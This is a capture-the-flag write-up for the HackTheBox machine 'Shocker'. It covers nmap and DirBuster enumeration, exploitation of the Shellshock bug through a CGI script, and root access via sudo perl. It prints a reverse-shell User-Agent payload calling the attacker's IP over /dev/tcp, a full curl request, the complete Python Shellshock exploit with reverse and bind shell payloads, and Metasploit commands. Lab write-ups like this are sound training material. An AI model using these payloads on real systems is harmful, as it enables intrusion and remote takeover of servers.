HackTheBox Write-Up — Shocker (Manual, Semi-Manual, & Metasploit)
Shocker is a challenge named after the Shellshock vulnerability also known as Bashdoor, which is a family of security bugs in the widely used Unix Bash shell. There are three ways to grab a low privilege shell on this machine, and one very simple method to privilege escalation.
nmap -T4 -p- 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-21 10:04 EDT
Stats: 0:00:23 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 75.75% done; ETC: 10:05 (0:00:07 remaining)
Nmap scan report for 10.10.10.56
Host is up (0.058s latency).
Not shown: 65533 closed ports
PORT STATE SERVICE
80/tcp open http
2222/tcp open EtherNetIP-1Nmap done: 1 IP address (1 host up) scanned in 38.34 seconds
Only two TCP ports are open. I’ll visit http://10.10.10.56 to see what’s showing while the next scan finishes.
nmap -T4 -p80,2222 10.10.10.56
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-21 10:05 EDT
Nmap scan report for 10.10.10.56
Host is up (0.056s latency).PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
2222/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
| 256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_ 256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.12 (95%), Linux 3.13 (95%), Linux 3.16 (95%), Linux 3.2 - 4.9 (95%), Linux 3.8 - 3.11 (95%), Linux 4.8 (95%), Linux 4.4 (95%), Linux 3.18 (95%), Linux 4.2 (95%), ASUS RT-N56U WAP (Linux 3.4) (95%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelTRACEROUTE (using port 80/tcp)
HOP RTT ADDRESS
1 55.96 ms 10.10.14.1
2 56.03 ms 10.10.10.56OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.02 seconds
Taking a look at the web server on port 80 it doesn’t give us much, and nothing shows when I view the page source.
Whenever I want to enumerate a web server I always run Dirbuster and Nikto by default. I know already that Nikto isn’t going to pop anything for us aside so we’re going to skip it.
Below you will find the proper parameters towards our Directory brute force.
We have found the /cgi-bin/ directory, which is the most popular attack vector for the Shellshock vulnerability.
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Wed May 27 08:37:33 EDT 2020
--------------------------------http://10.10.10.56:80
--------------------------------
Directories found during testing:Dirs found with a 200 response:/Dirs found with a 403 response:/cgi-bin/
/icons/
/icons/small/
Let’s enumerate further on the /cgi-bin/ directory, all of the parameters are the same except for the three changes below.
We’ve found an accessible shell script, which is great as everything else in the /cgi-bin/ directory has warranted a 403 response.
Let’s visit the location of this file in our web browser to download it, we can also execute the command below in a terminal. Keep in mind we can do this only because the file returns a 202 response.
wget http://10.10.10.56/cgi-bin/user.sh
Let’s see if we can exploit this shell script with Apache Shellshock.
As stated above, there are three possible ways to obtain a low privilege shell. We’re going to first start from the order given in the title of this Write-Up:
(1. Manual, 2. Semi-Manual, 3. & Metasploit.)
We’re going to intercept an HTTP request to http://10.10.10.56/cgi-bin/user.sh with BurpSuite by first setting our proxy settings so Burp can receive the request
Ensure that “Intercept is on” within Burp.
Make an HTTP request in your web browser to http://10.10.10.56/cgi-bin/user.sh and “Send to Repeater” with CTRL+R when you see the request in Burp.
Move over to Repeater and let’s send over a request by clicking “Go.”
Just as we left it! Above it is mentioned in a quick description of the “CGI” attack vector that the “User-Agent” variable is what is vulnerable to Shellshock, let’s see if we can get a reverse shell from it.
We’re going to add this one-liner to replace everything in the “User-Agent” field within the request. Be sure to change 10.10.14.10 to your machine’s IP address.
() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.10/4444 0>&1
I’ve also taken the request and have copied it as a curl command, so you can execute it in your terminal.
curl -i -s -k -X $'GET' \
-H $'Host: 10.10.10.56' -H $'User-Agent:() { :; }; /bin/bash -i >& /dev/tcp/10.10.14.10/4444 0>&1' -H $'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H $'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H $'Connection: close' -H $'Upgrade-Insecure-Requests: 1' \
$'http://10.10.10.56/cgi-bin/user.sh'Then we set up a listener using the value that follows the IP address, I’m using port 4444.
nc -nlvp 4444
Let’s send the request in Burp, or execute the curl command and see if we get a reverse shell.
Viola! We now have a low privilege shell. From here you can skip down to the Privilege escalation section of this write-up.
Next, we’re going to try to get a low privilege shell using the “Semi-Manual” method.
Because we already know the file inside the directory that is vulnerable to Shellshock (https://10.10.10.56/cgi-bin/user.sh,) we’re going to run the exploit embedded in the form of a python script which can be found below.
To download this, we’re going to type the following into our Kali terminal:
searchsploit -m 34900
#! /usr/bin/env python
from socket import *
from threading import Thread
import thread, time, httplib, urllib, sysstop = False
proxyhost = ""
proxyport = 0def usage():
print """Shellshock apache mod_cgi remote exploitUsage:
./exploit.py var=<value>Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages: specific cgi vulnerable pages (separated by comma)
proxy: host:port proxyPayloads:
"reverse" (unix unversal) TCP reverse shell (Requires: rhost, lhost, lport)
"bind" (uses non-bsd netcat) TCP bind shell (Requires: rhost, rport)Example:./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234Credits:Federico Galatolo 2014
"""
sys.exit(0)def exploit(lhost,lport,rhost,rport,payload,pages):
headers = {"Cookie": payload, "Referer": payload}
for page in pages:
if stop:
return
print "[-] Trying exploit on : "+page
if proxyhost != "":
c = httplib.HTTPConnection(proxyhost,proxyport)
c.request("GET","http://"+rhost+page,headers=headers)
res = c.getresponse()
else:
c = httplib.HTTPConnection(rhost)
c.request("GET",page,headers=headers)
res = c.getresponse()
if res.status == 404:
print "[*] 404 on : "+page
time.sleep(1)args = {}
for arg in sys.argv[1:]:
ar = arg.split("=")
args[ar[0]] = ar[1]
try:
args['payload']
except:
usage()
if args['payload'] == 'reverse':
try:
lhost = args['lhost']
lport = int(args['lport'])
rhost = args['rhost']
payload = "() { :;}; /bin/bash -c /bin/bash -i >& /dev/tcp/"+lhost+"/"+str(lport)+" 0>&1 &"
except:
usage()
elif args['payload'] == 'bind':
try:
rhost = args['rhost']
rport = args['rport']
payload = "() { :;}; /bin/bash -c 'nc -l -p "+rport+" -e /bin/bash &'"
except:
usage()
else:
print "[*] Unsupported payload"
usage()
try:
pages = args['pages'].split(",")
except:
pages = ["/cgi-sys/entropysearch.cgi","/cgi-sys/defaultwebpage.cgi","/cgi-mod/index.cgi","/cgi-bin/test.cgi","/cgi-bin-sdb/printenv"]try:
proxyhost,proxyport = args['proxy'].split(":")
except:
pass
if args['payload'] == 'reverse':
serversocket = socket(AF_INET, SOCK_STREAM)
buff = 1024
addr = (lhost, lport)
serversocket.bind(addr)
serversocket.listen(10)
print "[!] Started reverse shell handler"
thread.start_new_thread(exploit,(lhost,lport,rhost,0,payload,pages,))
if args['payload'] == 'bind':
serversocket = socket(AF_INET, SOCK_STREAM)
addr = (rhost,int(rport))
thread.start_new_thread(exploit,("",0,rhost,rport,payload,pages,))
buff = 1024
while True:
if args['payload'] == 'reverse':
clientsocket, clientaddr = serversocket.accept()
print "[!] Successfully exploited"
print "[!] Incoming connection from "+clientaddr[0]
stop = True
clientsocket.settimeout(3)
while True:
reply = raw_input(clientaddr[0]+"> ")
clientsocket.sendall(reply+"\n")
try:
data = clientsocket.recv(buff)
print data
except:
pass
if args['payload'] == 'bind':
try:
serversocket = socket(AF_INET, SOCK_STREAM)
time.sleep(1)
serversocket.connect(addr)
print "[!] Successfully exploited"
print "[!] Connected to "+rhost
stop = True
serversocket.settimeout(3)
while True:
reply = raw_input(rhost+"> ")
serversocket.sendall(reply+"\n")
data = serversocket.recv(buff)
print data
except:
pass
Taking a look at our exploit we’re going to need to enter these variables:
Vars:
rhost: victim host
rport: victim port for TCP shell binding
lhost: attacker host for TCP shell reversing
lport: attacker port for TCP shell reversing
pages: specific cgi vulnerable pages (separated by comma)
proxy: host:port proxyExample:./exploit.py payload=reverse rhost=1.2.3.4 lhost=5.6.7.8 lport=1234
./exploit.py payload=bind rhost=1.2.3.4 rport=1234
We will run the exploit with the variables needed below, ensure you change the LHOST/LPORT to your machine’s IP and Port you want to use.
python 34900.py payload=reverse rhost=10.10.10.56 lhost=10.10.14.10 lport=4444 pages=/cgi-bin/user.sh
No need to open up a listener because the script does it for us!
Next, we will be using Metasploit to execute the Shellshock vulnerability.
Metasploit has a scanner module to see if a remote host is vulnerable to Shellshock.
msfconsole
use auxiliary/scanner/http/apache_mod_cgi_bash_env
Set your RHOSTS, and TARGET URI:
set RHOSTS 10.10.10.56
set TARGETURI /cgi-bin/user.sh
Based on the output that we have above module’s options, it appears this machine is vulnerable to the Shellshock vulnerability.
We’re going to go ahead and use the Shellshock exploit module, to gain a reverse meterpreter shell.
https://www.rapid7.com/db/modules/exploit/multi/http/apache_mod_cgi_bash_env_exec
use exploit/multi/http/apache_mod_cgi_bash_env_exec
set RHOSTS 10.10.10.56
set TARGETURI /cgi-bin/user.sh
Run the exploit
Privilege Escalation:
Now that we’ve gained a shell three different ways it is time to find the user flag, and elevate our privileges to the root user as we are currently a low-privilege user.
Whichever way you have gained the low privilege shell, the method will be the same for all three.
The user flag is located at /home/shelly/user.txt
By typing in sudo -l we find that we can run Perl as SU without supplying a password.
This is very good for an attacker that has gained a foothold in any machine, and very bad for any administrator or sysadmin that has allowed for this mishap!
In very simple terms, as shown below — we can with Perl, as a privileged user — execute “-e” “/bin/sh” which is a shell session. This is a very common method to privilege escalation and can be found by searching Perl on GTFOBins.
sudo perl -e ‘exec “/bin/sh”;’
Just like that! We’ve #pwned Shocker!
